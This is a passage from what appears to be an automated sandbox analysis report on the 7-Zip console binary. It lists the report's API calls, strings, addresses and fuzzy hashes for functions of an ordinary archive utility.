                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetLargePageMinimum$kernel32.dll
                          • API String ID: 1646373207-2515562745
                          • Opcode ID: 89f6a5e6599d429218d63b06a02252fc5915582a5c61926627c99bed9b13699d
                          • Instruction ID: b8da0e3943f0b0edb713e58f307926a2fe9854174fdd2ad54ab59fa7e1dd0886
                          • Opcode Fuzzy Hash: 89f6a5e6599d429218d63b06a02252fc5915582a5c61926627c99bed9b13699d
                          • Instruction Fuzzy Hash: F6D0C7703603039EDB24BFF16C0F75976685D017417109054A405D15E2DF65D531CB61
                          APIs
                          • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 001A0359
                          • GetLastError.KERNEL32(?,?,00000000,?), ref: 001A0382
                          • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 001A03DA
                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 001A03F0
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorFileLastSecurity
                          • String ID:
                          • API String ID: 555121230-0
                          • Opcode ID: 88cf300359bee1f5317b8b1a5b90ffaa9f6f3a625a52b26664784db782502121
                          • Instruction ID: d1497866b7ea9581cefc0d66d2aaa79c4b3af532b08b5bf341b6dfaebdb8baae
                          • Opcode Fuzzy Hash: 88cf300359bee1f5317b8b1a5b90ffaa9f6f3a625a52b26664784db782502121
                          • Instruction Fuzzy Hash: D1316C78900209EFDF12DFA4C884BAEBBB5FF49344F108959E466D7251D770AE81DBA0
                          APIs
                          • __EH_prolog.LIBCMT ref: 00188300
                          • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 0018834F
                          • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 0018837C
                          • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 0018839B
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                          • String ID:
                          • API String ID: 1689166341-0
                          • Opcode ID: ba908b6d4c8e3ed86343bf4b14b44a817aac897643078811bac5748ab4d448d6
                          • Instruction ID: b4bface370f03e9a112d3a79ebfb3ac612a9db1613347df26afdff9b8893baaf
                          • Opcode Fuzzy Hash: ba908b6d4c8e3ed86343bf4b14b44a817aac897643078811bac5748ab4d448d6
                          • Instruction Fuzzy Hash: F3217172900204BFDF21AF94ED85AEEBBB9EB55750F20402DF945A6291CB318F44CF60
                          APIs
                          • wcscmp.MSVCRT ref: 001D8CC6
                          • __EH_prolog.LIBCMT ref: 001D88DD
                            • Part of subcall function 001D8E31: __EH_prolog.LIBCMT ref: 001D8E36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$wcscmp
                          • String ID: Can't open volume:
                          • API String ID: 3232955128-72083580
                          • Opcode ID: c540f5d730bf2d4b847d9cd38f3e7df416ef34dc49a9a99fbb76c9ff7ff04111
                          • Instruction ID: cb79e1b2e4fc66f35b60c7f6413d157091761b5bb3b15bd4400ebf7404a88e9d
                          • Opcode Fuzzy Hash: c540f5d730bf2d4b847d9cd38f3e7df416ef34dc49a9a99fbb76c9ff7ff04111
                          • Instruction Fuzzy Hash: 1102AD70900249DFCF25DBA8C494BEEBBB1AF65304F14809AE44AAB391DB749E85CF11
                          APIs
                          • __EH_prolog.LIBCMT ref: 001EAAEA
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfree
                          • String ID: EXE$exe
                          • API String ID: 1978129608-1088655240
                          • Opcode ID: 5e03faca1c6ce8a256e6ca174fc0db4b1e59c649f1a6f6173326b46672a02754
                          • Instruction ID: 4339a63aa27feadd962096b76218ec6900b4ab7e848421885a7f7627e11e98a4
                          • Opcode Fuzzy Hash: 5e03faca1c6ce8a256e6ca174fc0db4b1e59c649f1a6f6173326b46672a02754
                          • Instruction Fuzzy Hash: 64919F31900A49EFCF25DFA5C890AEEB7B5FF14310F608519E86A97251DB30BA45CB22
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: @$crc
                          • API String ID: 3519838083-849529298
                          • Opcode ID: 9cc630614e0519fe9c8136a56e9a6d35a42dba7797839c9b3d02eaf5934a8066
                          • Instruction ID: 8548ff206d8e35df4f24b9fabd0ac7ff80b6aa61f7b77714c8cba04f7cedadb3
                          • Opcode Fuzzy Hash: 9cc630614e0519fe9c8136a56e9a6d35a42dba7797839c9b3d02eaf5934a8066
                          • Instruction Fuzzy Hash: 03519B31900209EBCF16EF90D881EEEB7B5AF28354F158429E81667291DB74EF46CF50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: BlockPackSize$BlockUnpackSize
                          • API String ID: 3519838083-5494122
                          • Opcode ID: 4cb2986259288feddec3349fde787f883d7a89a5bf2df24db614161020aa3c5a
                          • Instruction ID: 53d425af170ef9f94dc2745c4b0cd42c3fc184834d7e041ce41c2450d55e5841
                          • Opcode Fuzzy Hash: 4cb2986259288feddec3349fde787f883d7a89a5bf2df24db614161020aa3c5a
                          • Instruction Fuzzy Hash: 6E51B471804685AEDF3ADFA488A1FFD7BB1AF36300F28445EE09657196D721DD88D701
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologstrcmp
                          • String ID: =
                          • API String ID: 1490138475-2525689732
                          • Opcode ID: 91d9ed790462164cfddcf5e9ce664de86b6c5e022bc290dc5aa698c721f9c416
                          • Instruction ID: 723d4accc76b6075050856044478733ad6581f4e457facb637baf42d96635cf6
                          • Opcode Fuzzy Hash: 91d9ed790462164cfddcf5e9ce664de86b6c5e022bc290dc5aa698c721f9c416
                          • Instruction Fuzzy Hash: 73417135A00249ABDF16FBA4C857BFE7BB6AFA1700F084019F501261D2DB754E46DB51
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018A4F8
                            • Part of subcall function 0018A384: __EH_prolog.LIBCMT ref: 0018A389
                            • Part of subcall function 00189E14: GetSystemInfo.KERNEL32(?), ref: 00189E36
                            • Part of subcall function 00189E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00189E50
                            • Part of subcall function 00189E14: GetProcAddress.KERNEL32(00000000), ref: 00189E57
                          • strcmp.MSVCRT ref: 0018A564
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                          • String ID: -
                          • API String ID: 2798778560-3695764949
                          • Opcode ID: 30e451fc551a55dd698a420802f21ef34db9e2be8f78fc6687ab305f5e5ae1ea
                          • Instruction ID: 8a6592ea72c5e5d2dec8bc8bad9fede7a521fdd8fdf6edaa2cb3eb7a70596f72
                          • Opcode Fuzzy Hash: 30e451fc551a55dd698a420802f21ef34db9e2be8f78fc6687ab305f5e5ae1ea
                          • Instruction Fuzzy Hash: 64315A32D01219EBDF16FBE0E8929EDB7B5AF24310F60402AF80172191DB715B85CF62
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: __aulldivstrlen
                          • String ID: M
                          • API String ID: 1892184250-3664761504
                          • Opcode ID: e40119c0635b6d839feff1b5c6c5846a9c1e8e09341b1f83b9f9535c25550f02
                          • Instruction ID: 5f9466c3582bc694c513d442a1f99d12f7a883299b7eb82a6e98b8d551dab2d3
                          • Opcode Fuzzy Hash: e40119c0635b6d839feff1b5c6c5846a9c1e8e09341b1f83b9f9535c25550f02
                          • Instruction Fuzzy Hash: A9110A326002445BDB25EAA5C991EEF77E99B99310F14082EE297971C1DB71AC4587A0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: 0$x
                          • API String ID: 3519838083-1948001322
                          • Opcode ID: 42affe07f3ce207e7955a38c4b6f7bd7b2454201ebce6482639e5ccbdfc0f035
                          • Instruction ID: 15a69e83e4c08b852d60cab241ef4eee57186a0c4aeb54884fdd377db84af103
                          • Opcode Fuzzy Hash: 42affe07f3ce207e7955a38c4b6f7bd7b2454201ebce6482639e5ccbdfc0f035
                          • Instruction Fuzzy Hash: 6E217936D11129DACF05EB98D992AEDB7B5FF69304F20016AE801B6241DB755F04CBA0
                          APIs
                          Strings
                          • Cannot open the file as archive, xrefs: 001B86D0
                          • Cannot open encrypted archive. Wrong password?, xrefs: 001B8698
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                          • API String ID: 1795875747-1623556331
                          • Opcode ID: 66546b4cc9e418e33cb7ba76304cc5be3d66601f5c7ee64c322f1864112fe018
                          • Instruction ID: eb19d9e69261a8bd769f21a4ab715aa8a6876446770900c6810bcd5b8978cb76
                          • Opcode Fuzzy Hash: 66546b4cc9e418e33cb7ba76304cc5be3d66601f5c7ee64c322f1864112fe018
                          • Instruction Fuzzy Hash: 6A01D6323002006BC619EA94D495ABEB3ABAFDC704F54441EF20283AC5DF74A812CF11
                          APIs
                          • __EH_prolog.LIBCMT ref: 001E4039
                            • Part of subcall function 001E40BA: __EH_prolog.LIBCMT ref: 001E40BF
                            • Part of subcall function 001C5E2B: __EH_prolog.LIBCMT ref: 001C5E30
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: D.#$T.#
                          • API String ID: 3519838083-2070575581
                          • Opcode ID: 392a1a226831c03c783412da078f9e3a76daa309184c65dbd8555d9962508c13
                          • Instruction ID: c7636eff7bc6bfece23b844234c58040cfdc3ff2f523363a5df17d291bd3bcce
                          • Opcode Fuzzy Hash: 392a1a226831c03c783412da078f9e3a76daa309184c65dbd8555d9962508c13
                          • Instruction Fuzzy Hash: 7B017CB1920B10DFC724DFA4D50568AFBF4AF18700F00892ED0AA93741D7B0AA58CF81
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID: =
                          • API String ID: 1795875747-2525689732
                          • Opcode ID: 3432c9532f547d3ef72fa5a797ad72b29c4bb245848fabce92aa40f3ce49c9f5
                          • Instruction ID: fcbc235f1bfd0a0f671eeb514c0d0e7dd70c49c78d8aa17d4c3cf65480e31a92
                          • Opcode Fuzzy Hash: 3432c9532f547d3ef72fa5a797ad72b29c4bb245848fabce92aa40f3ce49c9f5
                          • Instruction Fuzzy Hash: DDE0DF32E00124ABCF10BBE8AC568FE7B7DFB84B147100822E410D7250EB70DA22CBD1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$fputc
                          • String ID: `&$
                          • API String ID: 1185151155-1212904903
                          • Opcode ID: 1282fd7fe599b6eba59f9be616994d22ca61ca2b76eb075754533dddf45b9ad3
                          • Instruction ID: dab2898a3342cfd2a8dc28f176ed8bc7d0d32085fa4ee2715246a19e26e8032c
                          • Opcode Fuzzy Hash: 1282fd7fe599b6eba59f9be616994d22ca61ca2b76eb075754533dddf45b9ad3
                          • Instruction Fuzzy Hash: DFD0C27370111067C7213BE96C4189F631C9FC4710315040AF54093212C76169615BE0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID: Unsupported Windows version$p&$
                          • API String ID: 1795875747-2843031858
                          • Opcode ID: b0dfe0fda2d40fc539c690a716cd6deaabaa9b46e1af015c2933918aa5569e08
                          • Instruction ID: 30a95246b7c91e2801502ecca089b7690200af971e093435482d816a70d5f486
                          • Opcode Fuzzy Hash: b0dfe0fda2d40fc539c690a716cd6deaabaa9b46e1af015c2933918aa5569e08
                          • Instruction Fuzzy Hash: EDD0C9BB758210EFD7198BC8F98BBA877A0E789720F60846BE103C6191D7B564158A10
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001E41D6
                          • memcmp.MSVCRT(?,00230168,00000010), ref: 001E41F1
                          • memcmp.MSVCRT(?,002301E8,00000010), ref: 001E4205
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          • Opcode ID: 01da4a52bd8488e7a3c6d5f1c7bb971c385426e45c646f918f37d22cf2615815
                          • Instruction ID: 68772019571efdf948e7e1f8ff758a9b1d755262e2e8dd97a0e7a4f6c7691264
                          • Opcode Fuzzy Hash: 01da4a52bd8488e7a3c6d5f1c7bb971c385426e45c646f918f37d22cf2615815
                          • Instruction Fuzzy Hash: 4401047235030667DB148B11DC42FBD73E49B65710F044429FF89DB281F3B5A9A096D0